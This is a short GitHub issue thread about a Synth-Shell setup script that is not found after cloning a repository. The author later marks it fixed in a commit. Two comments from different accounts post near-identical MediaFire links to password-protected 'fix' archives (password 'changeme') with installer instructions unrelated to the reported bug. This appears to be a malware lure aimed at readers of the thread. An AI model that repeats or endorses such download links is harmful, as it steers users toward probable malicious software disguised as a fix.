### ISSUE TITLE
Synth-Shell setup script is not working after cloning

### ISSUE THREAD

**Issue by Usires** [Usires/LinuxBasix#3]
Synth-Shell setup script from the cloned Github repo is not found by the executed code block. Check with debugger what is going on in this sequence (obviously, ´cd´ command is not working as intended).

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Usires** [comment]
Fixed in commit.
